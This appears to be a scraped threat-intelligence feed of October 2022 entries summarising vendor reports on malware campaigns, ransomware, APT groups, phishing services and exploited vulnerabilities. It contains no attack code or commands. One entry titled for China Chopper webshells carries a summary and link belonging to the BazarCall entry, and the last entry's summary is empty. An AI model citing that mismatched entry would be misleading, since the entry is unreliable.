AgentTesla_Malware_Distributing_via_WSHRAT_Malware
Date of Scan:
2022-10-14
Impact:
LOW
Summary:
Uptycs researchers have identified a new Agent Tesla malware attack campaign and observed that the threat actors are now trying to drop Agent Tesla malware via WSHRAT malware.
Source: https://www.uptycs.com/blog/wshrat-acting-as-a-dropper-for-agent-tesla
2022-10-14
InfoStealer_Spreading_via_AnyDesk_Phishing_Site
LOW
+
Intel Source:
Cyble
Intel Name:
InfoStealer_Spreading_via_AnyDesk_Phishing_Site
Date of Scan:
2022-10-14
Impact:
LOW
Summary:
Researchers from Cyble have identified a phishing site that impersonates the genuine AnyDesk website. The infection starts when the user clicks the “Downloads” button on the phishing site, which downloads a malware file named “Anydesk.exe” from the remote server.
Source: https://blog.cyble.com/2022/10/13/mitsu-stealer-distributed-via-anydesk-phishing-site/
2022-10-14
The_examination_of_Wiper_Malware_Part_4
MEDIUM
+
Intel Source:
Crowdstrike
Intel Name:
The_examination_of_Wiper_Malware_Part_4
Date of Scan:
2022-10-14
Impact:
MEDIUM
Summary:
Researchers from CrowdStrike have covered some of the rarely used “helper” techniques implemented by wipers, which achieve secondary goals or facilitate a smaller portion of the wiping process.
Source: https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-4/
2022-10-14
Deep_Analysis_of_QBot_HTML_File
LOW
+
Intel Source:
ISC.SANS
Intel Name:
Deep_Analysis_of_QBot_HTML_File
Date of Scan:
2022-10-14
Impact:
LOW
Summary:
Researchers from SANS have analyzed a malicious QBot HTML file that contains BASE64 images with malware.
Source: https://isc.sans.edu/diary/Analysis+of+a+Malicious+HTML+File+QBot/29146/
2022-10-14
A_critical_authentication_bypass_vulnerability_CVE_2022_40684
HIGH
+
Intel Source:
Wordfence
Intel Name:
A_critical_authentication_bypass_vulnerability_CVE_2022_40684
Date of Scan:
2022-10-14
Impact:
HIGH
Summary:
The Wordfence Threat Intelligence team recorded several exploit attempts and requests on their network originating from malicious IP addresses and targeting CVE-2022-40684. CVE-2022-40684 is a critical authentication bypass vulnerability in the administrative interface of Fortinet’s FortiGate firewalls, FortiProxy web proxies, and FortiSwitch Manager, and is being actively exploited in the wild.
Source: https://www.wordfence.com/blog/2022/10/threat-advisory-cve-2022-40684-fortinet-appliance-auth-bypass/
2022-10-14
Prynt_malware_injection_techniques
LOW
+
Intel Source:
Cyfirma
Intel Name:
Prynt_malware_injection_techniques
Date of Scan:
2022-10-14
Impact:
LOW
Summary:
The CYFIRMA Research team analysed a sample of the “Prynt” infostealer, which was found to be a 32-bit console binary written in C/C++. Prynt has the capability to steal system information from infected systems, including files from targeted directories and credentials from web browsers.
Source: https://www.cyfirma.com/outofband/infostealer-prynt-malware-a-deep-dive-into-its-process-injection-technique/
2022-10-13
Various_malicious_remote_control_tools
LOW
+
Intel Source:
ASEC
Intel Name:
Various_malicious_remote_control_tools
Date of Scan:
2022-10-13
Impact:
LOW
Summary:
Researchers from ASEC have identified cases in which malicious actors use remote control tools that are commonly used by ordinary users. This allows attackers to bypass detection by security products and take control of the infected system in a GUI environment.
Source: https://asec.ahnlab.com/ko/39761/
2022-10-13
GuLoader_malware_disguised_as_Word
LOW
+
Intel Source:
ASEC
Intel Name:
GuLoader_malware_disguised_as_Word
Date of Scan:
2022-10-13
Impact:
LOW
Summary:
ASEC researchers have discovered that the GuLoader malware is being distributed to domestic corporate users.
Source: https://asec.ahnlab.com/ko/39878/
2022-10-13
WIP19_Group_Targeting_Telecommunication_and_IT_Industries
LOW
+
Intel Source:
SentinelOne
Intel Name:
WIP19_Group_Targeting_Telecommunication_and_IT_Industries
Date of Scan:
2022-10-13
Impact:
LOW
Summary:
SentinelOne researchers have tracked a new Chinese-speaking threat group known as WIP19 that is targeting telecommunications and IT service providers in the Middle East and Asia.
Source: https://www.sentinelone.com/labs/wip19-espionage-new-chinese-apt-targets-it-service-providers-and-telcos-with-signed-malware/
2022-10-13
Magniber_Ransomware_continues_targeting_Home_Users_with_Fake_Software_Updates
MEDIUM
+
Intel Source:
HP Threat Research
Intel Name:
Magniber_Ransomware_continues_targeting_Home_Users_with_Fake_Software_Updates
Date of Scan:
2022-10-13
Impact:
MEDIUM
Summary:
Researchers from HP shared their analysis of a Magniber ransomware campaign that has been running since September and targets home users by masquerading as software updates. The attackers used detection-evasion techniques such as running the ransomware in memory and bypassing User Account Control (UAC) in Windows.
Source: https://threatresearch.ext.hp.com/magniber-ransomware-switches-to-javascript-targeting-home-users-with-fake-software-updates/
2022-10-13
Top_malware_statistics_for_last_two_weeks
MEDIUM
+
Intel Source:
ASEC
Intel Name:
Top_malware_statistics_for_last_two_weeks
Date of Scan:
2022-10-13
Impact:
MEDIUM
Summary:
The ASEC team analyzed and collected statistics on the top 5 malware families from September 26th, 2022 (Monday) to October 2nd, 2022 (Sunday).
Source: https://asec.ahnlab.com/en/39627/
2022-10-13
New_Attack_Technique_Leveraging_Alchimist_and_Insekt_Malware
MEDIUM
+
Intel Source:
Cisco Talos
Intel Name:
New_Attack_Technique_Leveraging_Alchimist_and_Insekt_Malware
Date of Scan:
2022-10-13
Impact:
MEDIUM
Summary:
Researchers from Cisco have discovered a new attack framework, including a command and control (C2) tool called "Alchimist" and a new malware family, "Insekt", written in Go and targeting Windows, macOS, and Linux in the wild.
Source: https://blog.talosintelligence.com/2022/10/alchimist-offensive-framework.html
2022-10-13
A_new_ongoing_tech_support_scam
LOW
+
Intel Source:
Cyble
Intel Name:
A_new_ongoing_tech_support_scam
Date of Scan:
2022-10-13
Impact:
LOW
Summary:
Cyble Research & Intelligence Labs researchers identified a new ongoing tech support scam in which the threat actor has developed various phishing websites that impersonate Microsoft support sites and display a fake Windows Defender alert.
Source: https://blog.cyble.com/2022/10/11/massive-tech-support-scam-exposed/
2022-10-13
Budworm_Hackers_Targeting_US_Organization
LOW
+
Intel Source:
Symantec
Intel Name:
Budworm_Hackers_Targeting_US_Organization
Date of Scan:
2022-10-13
Impact:
LOW
Summary:
Researchers from the Symantec Threat Hunter team have identified the APT group named Budworm targeting an unnamed U.S. state legislature for the first time.
Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/budworm-espionage-us-state
2022-10-13
8220_Gang_continues_to_target_misconfigured_cloud_workloads
MEDIUM
+
Intel Source:
SentinelOne
Intel Name:
8220_Gang_continues_to_target_misconfigured_cloud_workloads
Date of Scan:
2022-10-13
Impact:
MEDIUM
Summary:
SentinelOne noted that 8220 Gang had expanded its cloud service botnet and the group has rotated its attack infrastructure and continued to absorb compromised hosts into its botnet and to distribute cryptocurrency mining malware. 8220 Gang identifies targets via scanning for misconfigured or vulnerable hosts on the public internet.
Source: https://www.sentinelone.com/blog/8220-gang-cloud-botnet-targets-misconfigured-cloud-workloads/
2022-10-12
MS_Excel_File_Delivering_Multi_Stage_Cobalt_Strike_Loader
LOW
+
Intel Source:
Fortinet
Intel Name:
MS_Excel_File_Delivering_Multi_Stage_Cobalt_Strike_Loader
Date of Scan:
2022-10-12
Impact:
LOW
Summary:
FortiGuard Labs researchers have discovered a malicious Excel document masquerading as a salary calculation tool for Ukrainian troops. It executes evasive multi-stage loaders, eventually resulting in the victim's device being infected with Cobalt Strike Beacon malware.
Source: https://www.fortinet.com/blog/threat-research/ukrainian-excel-file-delivers-multi-stage-cobalt-strike-loader?&web_view=true
2022-10-12
Qakbot_Distribution_Method_Changed_from_Excel_Macro_to_ISO_Files
LOW
+
Intel Source:
ASEC
Intel Name:
Qakbot_Distribution_Method_Changed_from_Excel_Macro_to_ISO_Files
Date of Scan:
2022-10-12
Impact:
LOW
Summary:
ASEC researchers have identified that Qakbot, an online banking malware, has changed its distribution method from Excel 4.0 Macro to ISO files.
Source: https://asec.ahnlab.com/en/39537/
2022-10-12
Caffeine_Service_Allows_Anyone_Launch_Microsoft_365_Phishing_Attacks
LOW
+
Intel Source:
Mandiant
Intel Name:
Caffeine_Service_Allows_Anyone_Launch_Microsoft_365_Phishing_Attacks
Date of Scan:
2022-10-12
Impact:
LOW
Summary:
Researchers from Mandiant discovered and thoroughly tested the phishing-as-a-service (PhaaS) platform named 'Caffeine'. The investigation followed a large-scale phishing campaign run through the service, targeting one of Mandiant's clients to steal Microsoft 365 account credentials.
Source: https://www.mandiant.com/resources/blog/caffeine-phishing-service-platform
2022-10-12
GlobeImposter_Ransomware_Targeting_Vulnerable_MS_SQL_Servers
LOW
+
Intel Source:
ASEC
Intel Name:
GlobeImposter_Ransomware_Targeting_Vulnerable_MS_SQL_Servers
Date of Scan:
2022-10-12
Impact:
LOW
Summary:
Researchers from ASEC have identified that the GlobeImposter ransomware, which targets vulnerable MS-SQL servers, is being distributed in Korea.
Source: https://asec.ahnlab.com/en/39706/
2022-10-12
Black_Basta_Ransomware_Using_QAKBOT_Brute_Ratel_and_Cobalt_Strike
MEDIUM
+
Intel Source:
TrendMicro
Intel Name:
Black_Basta_Ransomware_Using_QAKBOT_Brute_Ratel_and_Cobalt_Strike
Date of Scan:
2022-10-12
Impact:
MEDIUM
Summary:
Researchers from Trend Micro have analyzed QAKBOT-related cases that lead to Brute Ratel C4 and Cobalt Strike payloads and can be attributed to the threat actors behind the Black Basta ransomware.
Source: https://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html
2022-10-12
Lazarus_Group_Leveraging_DLL_Side-Loading_Technique
MEDIUM
+
Intel Source:
ASEC
Intel Name:
Lazarus_Group_Leveraging_DLL_Side-Loading_Technique
Date of Scan:
2022-10-12
Impact:
MEDIUM
Summary:
ASEC researchers have discovered that the Lazarus group is using the DLL side-loading technique (T1574.002), abusing legitimate applications in the initial compromise stage to proceed to the next stage of their attack.
Source: https://asec.ahnlab.com/en/39828/
2022-10-11
The_Snake_Keylogger_malware_analyses
LOW
+
Intel Source:
X-Junior
Intel Name:
The_Snake_Keylogger_malware_analyses
Date of Scan:
2022-10-11
Impact:
LOW
Summary:
The researcher X-Junior provided a deep analysis of Snake Keylogger in his post. Snake Keylogger is malware developed in .NET whose purpose is to steal sensitive information from the victim’s device: saved credentials, the victim’s keystrokes, screenshots of the victim’s screen, and clipboard data.
Source: https://x-junior.github.io/malware%20analysis/2022/06/24/Snakekeylogger.html#introduction
2022-10-11
Emotet_Malware_Using_Evasion_Techniques_in_Recent_Attacks
LOW
+
Intel Source:
VMware
Intel Name:
Emotet_Malware_Using_Evasion_Techniques_in_Recent_Attacks
Date of Scan:
2022-10-11
Impact:
LOW
Summary:
Researchers from VMware have analyzed the threat actors associated with the notorious Emotet malware, who are continually shifting their tactics and command-and-control (C2) infrastructure to escape detection.
Source: https://news.vmware.com/security/vmware-report-exposes-emotet-malware https://www.vmware.com/content/dam/learn/en/amer/fy23/pdf/1669005_Emotet_Exposed_A_Look_Inside_the_Cybercriminal_Supply_Chain.pdf
2022-10-11
A_Detailed_Analysis_of_Malicious_Tools_Used_by_Cyber_Espionage_Group_Earth_Aughisky
LOW
+
Intel Source:
TrendMicro
Intel Name:
A_Detailed_Analysis_of_Malicious_Tools_Used_by_Cyber_Espionage_Group_Earth_Aughisky
Date of Scan:
2022-10-11
Impact:
LOW
Summary:
Trend Micro researchers have analyzed the Earth Aughisky threat group and tools with components that have yet to be identified, reported, or attributed to the group. The group is known for its ability to abuse legitimate accounts, software, applications, and other weaknesses in network design and infrastructure for its own ends.
Source: https://www.trendmicro.com/en_us/research/22/j/tracking-earth-aughiskys-malware-and-changes.html
2022-10-11
Caffeine_Service_Allows_Anyone_Launch_Microsoft_365_Phishing_Attacks
LOW
+
Intel Source:
Mandiant
Intel Name:
Caffeine_Service_Allows_Anyone_Launch_Microsoft_365_Phishing_Attacks
Date of Scan:
2022-10-11
Impact:
LOW
Summary:
Researchers from Mandiant discovered and thoroughly tested the phishing-as-a-service (PhaaS) platform named 'Caffeine'. The investigation followed a large-scale phishing campaign run through the service, targeting one of Mandiant's clients to steal Microsoft 365 account credentials.
Source: https://www.mandiant.com/resources/blog/caffeine-phishing-service-platform
2022-10-11
POLONIUM_threat_group_attacks_on_Israel_continue
LOW
+
Intel Source:
WeliveSecurity
Intel Name:
POLONIUM_threat_group_attacks_on_Israel_continue
Date of Scan:
2022-10-11
Impact:
LOW
Summary:
ESET researchers shared their findings about POLONIUM, an APT group whose initial compromise vector is unknown. According to ESET telemetry, POLONIUM has used custom backdoors and cyberespionage tools against more than a dozen organizations in Israel, including those in engineering, information technology, law, communications, branding and marketing, media, insurance, and social services.
Source: https://www.welivesecurity.com/2022/10/11/polonium-targets-israel-creepy-malware/
2022-10-10
The_installations_of_the_malicious_NPM_packages_by_“LofyGang”_group
LOW
+
Intel Source:
Checkmarx
Intel Name:
The_installations_of_the_malicious_NPM_packages_by_“LofyGang”_group
Date of Scan:
2022-10-10
Impact:
LOW
Summary:
Checkmarx discovered around 200 malicious NPM packages with thousands of installations linked to an attack group called “LofyGang”. The group has been active for over a year with multiple goals, including stealing credit card information, streaming service accounts (e.g. Disney+), Minecraft accounts, Discord “Nitro” (premium) upgrades, and more.
Source: https://checkmarx.com/blog/lofygang-software-supply-chain-attackers-organized-persistent-and-operating-for-over-a-year/
2022-10-10
IcedID_campaign_metrics
LOW
+
Intel Source:
Team-cymru
Intel Name:
IcedID_campaign_metrics
Date of Scan:
2022-10-10
Impact:
LOW
Summary:
Team Cymru researchers pulled back the curtain on IcedID campaign metrics and Stage 1 C2 infrastructure, compiling detailed metrics to shed light on behaviors and details that are not often available. These metrics are numbers the threat actors are watching as well, and, just like for any other business, they may influence their future actions.
Source: https://www.team-cymru.com/post/a-visualizza-into-recent-icedid-campaigns
2022-10-10
CISA_Malware_Analysis_Report_CovalentStealer
MEDIUM
+
Intel Source:
CISA
Intel Name:
CISA_Malware_Analysis_Report_CovalentStealer
Date of Scan:
2022-10-10
Impact:
MEDIUM
Summary:
Researchers at CISA gathered malware samples from live incident responses loaded with CovalentStealer, which is designed to identify and exfiltrate files to a remote server.
Source: https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-277a
2022-10-10
Modified_FiveM_Spoofer_activity
LOW
+
Intel Source:
Cyble
Intel Name:
Modified_FiveM_Spoofer_activity
Date of Scan:
2022-10-10
Impact:
LOW
Summary:
Cyble researchers continuously monitor phishing campaigns that distribute different malware families. Recently, they identified a malicious site that redirects the user to a Discord channel where the threat actor announces a spoofer for sale that claims to get users unbanned from FiveM. FiveM is a mod project that allows gamers to play Grand Theft Auto V (GTA5) with custom multiplayer modes on customized dedicated servers.
Source: https://blog.cyble.com/2022/10/07/modified-fivem-spoofer-targeting-gamers/
2022-10-10
LockBit_3.0_Ransomware_Spreads_again
MEDIUM
+
Intel Source:
Rewterz
Intel Name:
LockBit_3.0_Ransomware_Spreads_again
Date of Scan:
2022-10-10
Impact:
MEDIUM
Summary:
Researchers discovered that LockBit 3.0 ransomware is being delivered in Word document format while masquerading as job application emails, alongside the NSIS format seen earlier. The exact distribution method has not yet been identified, but given that the file names include people’s names, such as ‘Lim Gyu Min.docx’ or ‘Jeon Chae Rin.docx,’ it is possible that they were spread disguised as job applications, as in previous occurrences.
Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-lockbit-3-0-ransomware-spreads-via-word-documents-active-iocs
2022-10-10
The_"China_Chopper"_webshells_deailed_malware_report
LOW
+
Intel Source:
CISA
Intel Name:
The_"China_Chopper"_webshells_deailed_malware_report
Date of Scan:
2022-10-10
Impact:
LOW
Summary:
The BazarCall campaigns were found to be most active in the United States and Canada. BazarCall campaigns forgo malicious links or attachments in email messages in favor of phone numbers that recipients are misled into calling. It’s a technique reminiscent of vishing and tech support scams, where potential victims are cold-called by the attacker, except that in BazarCall’s case the targeted users must dial the number themselves.
Source: https://www.trellix.com/en-us/about/newsroom/stories/research/evolution-of-bazarcall-social-engineering-tactics.html
2022-10-10
CISA_Malware_Analysis_Report_HyperBro
MEDIUM
+
Intel Source:
CISA
Intel Name:
CISA_Malware_Analysis_Report_HyperBro
Date of Scan:
2022-10-10
Impact:
MEDIUM
Summary:
Researchers at CISA gathered malware samples from live incident responses loaded with HyperBro, a remote access trojan that provides attackers with a backdoor.
Source: https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-277b
2022-10-10
Another_look_at_recent_IcedID_campaigns
LOW
+
Intel Source:
ISC.SANS
Intel Name:
Another_look_at_recent_IcedID_campaigns
Date of Scan:
2022-10-10
Impact:
LOW
Summary:
A researcher from SANS ISC had another look at recent IcedID campaigns using PNG files to hide their malicious payload.
Source: https://isc.sans.edu/diary/More+IcedID/29116
2022-10-10
A_close_look_at_an_item_called_CustomXMLParts
LOW
+
Intel Source:
Inquest
Intel Name:
A_close_look_at_an_item_called_CustomXMLParts
Date of Scan:
2022-10-10
Impact:
LOW
Summary:
In this post the researcher covers an item called "CustomXMLParts", an XML container for storing arbitrary data to be used in an Office document. Its intended purpose appears to be giving developers a way to change the formatting of the Office document in ways not otherwise available, or to add additional functionality.
Source: https://inquest.net/blog/2022/10/03/hiding-xml
2022-10-07
Phishers_Using_HTML_Attachments_to_Steal_Sensitive_Information
LOW
+
Intel Source:
SpiderLabs
Intel Name:
Phishers_Using_HTML_Attachments_to_Steal_Sensitive_Information
Date of Scan:
2022-10-07
Impact:
LOW
Summary:
According to Trustwave SpiderLabs, HTML file attachments have become a common occurrence in spam traps. As phishing spam is often a vehicle for malware delivery, this is not uncommon.
Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/html-file-attachments-still-a-threat/
2022-10-07
BazarCall_social_engineering_tactics
LOW
+
Intel Source:
Trellix
Intel Name:
BazarCall_social_engineering_tactics
Date of Scan:
2022-10-07
Impact:
LOW
Summary:
The BazarCall campaigns were found to be most active in the United States and Canada. BazarCall campaigns forgo malicious links or attachments in email messages in favor of phone numbers that recipients are misled into calling. It’s a technique reminiscent of vishing and tech support scams, where potential victims are cold-called by the attacker, except that in BazarCall’s case the targeted users must dial the number themselves.
Source: https://www.trellix.com/en-us/about/newsroom/stories/research/evolution-of-bazarcall-social-engineering-tactics.html
2022-10-07
Mustang_Panda_APT_Group_Leveraging_PlugX_Malware_Family
LOW
+
Intel Source:
BlackBerry
Intel Name:
Mustang_Panda_APT_Group_Leveraging_PlugX_Malware_Family
Date of Scan:
2022-10-07
Impact:
LOW
Summary:
Researchers from BlackBerry have discovered a campaign by an APT group called Mustang Panda that is leveraging the PlugX malware family to target the Southeast Asian state of Myanmar.
Source: https://blogs.blackberry.com/en/2022/10/mustang-panda-abuses-legitimate-apps-to-target-myanmar-based-victims
2022-10-07
A_novel_backdoor_malware_targeting_Microsoft_SQL_servers
LOW
+
Intel Source:
Medium
Intel Name:
A_novel_backdoor_malware_targeting_Microsoft_SQL_servers
Date of Scan:
2022-10-07
Impact:
LOW
Summary:
DCSO CyTec recently found a novel backdoor malware targeting Microsoft SQL servers. The malware comes in the form of an “Extended Stored Procedure” DLL, a special type of extension used by Microsoft SQL servers. Once loaded into a server by an attacker, it is controlled solely through SQL queries.
Source: https://medium.com/@DCSO_CyTec/mssql-meet-maggie-898773df3b01
2022-10-07
Domain_Generation_Algorithm_tactic_used_by_malware
LOW
+
Intel Source:
ISC.SANS
Intel Name:
Domain_Generation_Algorithm_tactic_used_by_malware
Date of Scan:
2022-10-07
Impact:
LOW
Summary:
A researcher from SANS ISC discovered a simple malicious PowerShell script that implements a backdoor with DGA capability. A DGA (“Domain Generation Algorithm”) is a popular tactic used by malware to make connections to its C2 stealthier and more difficult to block. The idea is to generate domain names periodically and use them only during a defined period.
Source: https://isc.sans.edu/diary/Powershell+Backdoor+with+DGA+Capability/29122/
2022-10-07
Hackers_Exploiting_CVE_2017_11882_and_Delivering_Multiple_Malware
LOW
+
Intel Source:
Fortinet
Intel Name:
Hackers_Exploiting_CVE_2017_11882_and_Delivering_Multiple_Malware
Date of Scan:
2022-10-07
Impact:
LOW
Summary:
Researchers at FortiGuard have found a malicious file embedded in an Excel document. Embedded files with randomized file names exploit vulnerability CVE-2017-11882 to execute malicious code that delivers and executes malware on victims' devices.
Source: https://www.fortinet.com/blog/threat-research/excel-document-delivers-multiple-malware-exploiting-cve-2017-11882-part-two
2022-10-07
Fake_Ransomware_Spreading_via_Phishing_Emails
LOW
+
Intel Source:
Cyble
Intel Name:
Fake_Ransomware_Spreading_via_Phishing_Emails
Date of Scan:
2022-10-07
Impact:
LOW
Summary:
Researchers from Cyble have identified a website that is distributing a fake ransomware executable. Instead of encrypting files, the fake ransomware changes file names and extensions, drops ransom notes, and demands that victims pay a ransom as usual.
Source: https://blog.cyble.com/2022/10/06/fake-ransomware-infection-under-widespread/
2022-10-06
Over_250_Microsoft_SQL_Servers_Infected_By_New_Maggie_Malware
MEDIUM
+
Intel Source:
DCSO CyTec Blog
Intel Name:
Over_250_Microsoft_SQL_Servers_Infected_By_New_Maggie_Malware
Date of Scan:
2022-10-06
Impact:
MEDIUM
Summary:
DCSO CyTec researchers have identified a new malware, named Maggie, that has already infected over 250 Microsoft SQL servers worldwide. Most of the infected instances are in South Korea, India, Vietnam, China, Russia, Thailand, Germany, and the United States.
Source: https://medium.com/@DCSO_CyTec/mssql-meet-maggie-898773df3b01
2022-10-06
Diving_Deep_into_LilithBot_Malware
LOW
+
Intel Source:
Zscaler
Intel Name:
Diving_Deep_into_LilithBot_Malware
Date of Scan:
2022-10-06
Impact:
LOW
Summary:
Zscaler researchers have discovered a sample of multi-function malware called "LilithBot" which is associated with the Eternity threat group (a.k.a. EternityTeam; Eternity Project), linked to the Russian “Jester Group,” that has been active since at least January 2022.
Source: https://www.zscaler.com/blogs/security-research/analysis-lilithbot-malware-and-eternity-threat-group?&web_view=true
2022-10-06
DLL_Side_Loading_Attack_Leveraging_OneDrive_Application
LOW
+
Intel Source:
BitDefender
Intel Name:
DLL_Side_Loading_Attack_Leveraging_OneDrive_Application
Date of Scan:
2022-10-06
Impact:
LOW
Summary:
Researchers from BitDefender have identified and documented a cryptojacking campaign exploiting known DLL sideloading vulnerabilities in Microsoft OneDrive.
Source: https://www.bitdefender.com/files/News/CaseStudies/study/424/Bitdefender-PR-Whitepaper-SLOneDriveCyberJack-creat6318-en-EN.pdf
2022-10-06
A_Deep_Examination_of_PseudoManuscrypt_Malware
LOW
+
Intel Source:
BitSight
Intel Name:
A_Deep_Examination_of_PseudoManuscrypt_Malware
Date of Scan:
2022-10-06
Impact:
LOW
Summary:
The BitSight researchers have analyzed the PseudoManuscrypt malware. They describe how they went from unknown DGA-like domains to sinkholes mimicking the infrastructure of a relatively recent botnet that has infected nearly 500,000 machines (2.2M unique IP addresses) across at least 40 countries in the last 8 months, and has an estimated botnet size of around 50,000 machines.
Source: https://www.bitsight.com/blog/zero-50k-infections-pseudomanuscrypt-sinkholing-part-1
2022-10-06
Phishing_Campaigns_in_Q3_Delivering_Malware
MEDIUM
+
Intel Source:
Fortinet
Intel Name:
Phishing_Campaigns_in_Q3_Delivering_Malware
Date of Scan:
2022-10-06
Impact:
MEDIUM
Summary:
Researchers from Fortinet have elaborated on multiple phishing campaigns in Q3 delivering malware and targeting Windows users.
Source: https://www.fortinet.com/blog/threat-research/delivery-of-malware-phishing-campaigns-in-q3-2022
2022-10-05
Magniber_Ransomware_file_extension_changed_from_js_to_wsf
LOW
+
Intel Source:
ASEC
Intel Name:
Magniber_Ransomware_file_extension_changed_from_js_to_wsf
Date of Scan:
2022-10-05
Impact:
LOW
Summary:
Researchers from ASEC have analyzed the Magniber ransomware script in WSF format, after its extension changed from *.js to *.wsf.
Source: https://asec.ahnlab.com/en/39489/
2022-10-05
The_OnionPoison_malicious_campaign
LOW
+
Intel Source:
Securelist
Intel Name:
The_OnionPoison_malicious_campaign
Date of Scan:
2022-10-05
Impact:
LOW
Summary:
Securelist researchers discovered multiple downloads of previously unclustered malicious Tor Browser installers. According to their measurements, all the victims targeted by these installers are located in China.
Source: https://securelist.com/onionpoison-infected-tor-browser-installer-youtube/107627/
2022-10-05
Hackers_using_Comm100_Desktop_Agent_App_to_Spread_Malware
LOW
+
Intel Source:
Crowdstrike
Intel Name:
Hackers_using_Comm100_Desktop_Agent_App_to_Spread_Malware
Date of Scan:
2022-10-05
Impact:
LOW
Summary:
Researchers from CrowdStrike have identified a new supply chain attack that involves the use of a trojanized installer for the Comm100 Live Chat application to distribute a JavaScript backdoor.
Source: https://www.crowdstrike.com/blog/new-supply-chain-attack-leverages-comm100-chat-installer/
2022-10-05
The_utilize_of_Wufoo_phishing_scams
LOW
+
Intel Source:
Cofense
Intel Name:
The_utilize_of_Wufoo_phishing_scams
Date of Scan:
2022-10-05
Impact:
LOW
Summary:
The Cofense Phishing Defense Center recently observed phishing scams that use the online form builder Wufoo, a tool commonly associated with easily created surveys and online registration forms. Threat actors have used Wufoo to build simple but effective credential-stealing forms.
Source: https://cofense.com/blog/scammers-utilize-wufoo-for-vacation-request-phish
2022-10-05
A_MafiaWare666_ransomware_decryption_tool
LOW
+
Intel Source:
Avast
Intel Name:
A_MafiaWare666_ransomware_decryption_tool
Date of Scan:
2022-10-05
Impact:
LOW
Summary:
Avast researchers have released a MafiaWare666 ransomware decryption tool. They discovered a weakness in the encryption scheme that allows files encrypted by some variants to be decrypted without paying the ransom. New or previously unknown samples may encrypt files differently, so they may not be decryptable without further analysis. MafiaWare666 is also known as JCrypt, RIP Lmao, BrutusptCrypt and Hades.
Source: https://decoded.avast.io/threatresearch/decrypted-mafiaware666-ransomware/
2022-10-05
BlackByte_Malware_returns_with_new_tactics
LOW
+
Intel Source:
Sophos
Intel Name:
BlackByte_Malware_returns_with_new_tactics
Date of Scan:
2022-10-05
Impact:
LOW
Summary:
Researchers from Sophos uncovered BlackByte using a new tactic to bypass security products: it brings along the vulnerable MSI Afterburner driver RTCore64.sys (CVE-2019-16098) and exploits it to blind the kernel-level monitoring of security products, a Bring Your Own Vulnerable Driver (BYOVD) technique.
Source: https://news.sophos.com/en-us/2022/10/04/blackbyte-ransomware-returns/
2022-10-05
Highly_evasive_SolarMarker_malware_activity
LOW
+
Intel Source:
eSentire
Intel Name:
Highly_evasive_SolarMarker_malware_activity
Date of Scan:
2022-10-05
Impact:
LOW
Summary:
Researchers from eSentire have observed a spike in drive-by download malware campaigns delivering SolarMarker disguised as document templates.
Source: https://www.esentire.com/security-advisories/solarmarker-malware-activity
2022-10-04
Lazarus_group_exploiting_Dell_Driver_Vulnerability_to_Disable_Windows_Security
MEDIUM
+
Intel Source:
WeliveSecurity
Intel Name:
Lazarus_group_exploiting_Dell_Driver_Vulnerability_to_Disable_Windows_Security
Date of Scan:
2022-10-04
Impact:
MEDIUM
Summary:
ESET researchers have identified the Lazarus group deploying a tool that exploits the Dell DBUtil driver flaw (CVE-2021-21551) to disable the monitoring of all security solutions on compromised machines, using never-before-seen techniques against Windows kernel mechanisms.
Source: https://www.welivesecurity.com/2022/09/30/amazon-themed-campaigns-lazarus-netherlands-belgium/
2022-10-04
Diving_Deep_into_DeftTorero_Actor
LOW
+
Intel Source:
Securelist
Intel Name:
Diving_Deep_into_DeftTorero_Actor
Date of Scan:
2022-10-04
Impact:
LOW
Summary:
Researchers from Securelist have deeply analyzed the DeftTorero threat actor (aka Lebanese Cedar, Volatile Cedar) and it is believed to originate from the Middle East.
Source: https://securelist.com/defttorero-tactics-techniques-and-procedures/107610/
2022-10-04
North_Korean_Hackers_Leveraging_Open_Source_Software
MEDIUM
+
Intel Source:
Microsoft
Intel Name:
North_Korean_Hackers_Leveraging_Open_Source_Software
Date of Scan:
2022-10-04
Impact:
MEDIUM
Summary:
Researchers from Microsoft have observed the Zinc threat actor weaponizing a wide range of open-source software, including PuTTY, KiTTY, TightVNC, Sumatra PDF Reader, and the muPDF/Subliminal Recording software installer, for its attacks.
Source: https://www.microsoft.com/security/blog/2022/09/29/zinc-weaponizing-open-source-software/
2022-10-04
Linux_ransomware_Cheerscrypt_linked_with_Chinese_DEV_0401_APT_group
LOW
+
Intel Source:
Sygnia
Intel Name:
Linux_ransomware_Cheerscrypt_linked_with_Chinese_DEV_0401_APT_group
Date of Scan:
2022-10-04
Impact:
LOW
Summary:
Researchers from Sygnia have investigated a Cheerscrypt ransomware attack that used Night Sky ransomware TTPs and linked the Linux ransomware Cheerscrypt to the China-linked cyber espionage group Bronze Starlight (aka DEV-0401, Emperor Dragonfly), which has been associated with APT10.
Source: https://blog.sygnia.co/revealing-emperor-dragonfly-a-chinese-ransomware-group
2022-10-04
New_variant_of_ransomware_dubbed_DJVU
MEDIUM
+
Intel Source:
BlackBerry
Intel Name:
New_variant_of_ransomware_dubbed_DJVU
Date of Scan:
2022-10-04
Impact:
MEDIUM
Summary:
BlackBerry researchers have identified a new DJVU ransomware variant that includes several layers of obfuscation. The threat group behind it is connected with other malware operations, giving it the option to download and deploy information stealers to exfiltrate data, a second way to profit at victims' expense.
Source: https://blogs.blackberry.com/en/2022/09/djvu-the-ransomware-that-seems-strangely-familiar
2022-10-04
Hackers_using_Microsoft_Office_Documents_to_Deliver_Agent_Tesla_and_njRat
LOW
+
Intel Source:
Fortinet
Intel Name:
Hackers_using_Microsoft_Office_Documents_to_Deliver_Agent_Tesla_and_njRat
Date of Scan:
2022-10-04
Impact:
LOW
Summary:
Researchers from Fortinet have analyzed some malicious Microsoft Office documents that attempted to leverage legitimate websites to execute a shell script and then dropped two malware variants of Agent Tesla and njRat.
Source: https://www.fortinet.com/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat?&web_view=true
2022-10-04
Bumblebee_malware_continues_to_expand_its_capabilities
LOW
+
Intel Source:
Checkpoint
Intel Name:
Bumblebee_malware_continues_to_expand_its_capabilities
Date of Scan:
2022-10-04
Impact:
LOW
Summary:
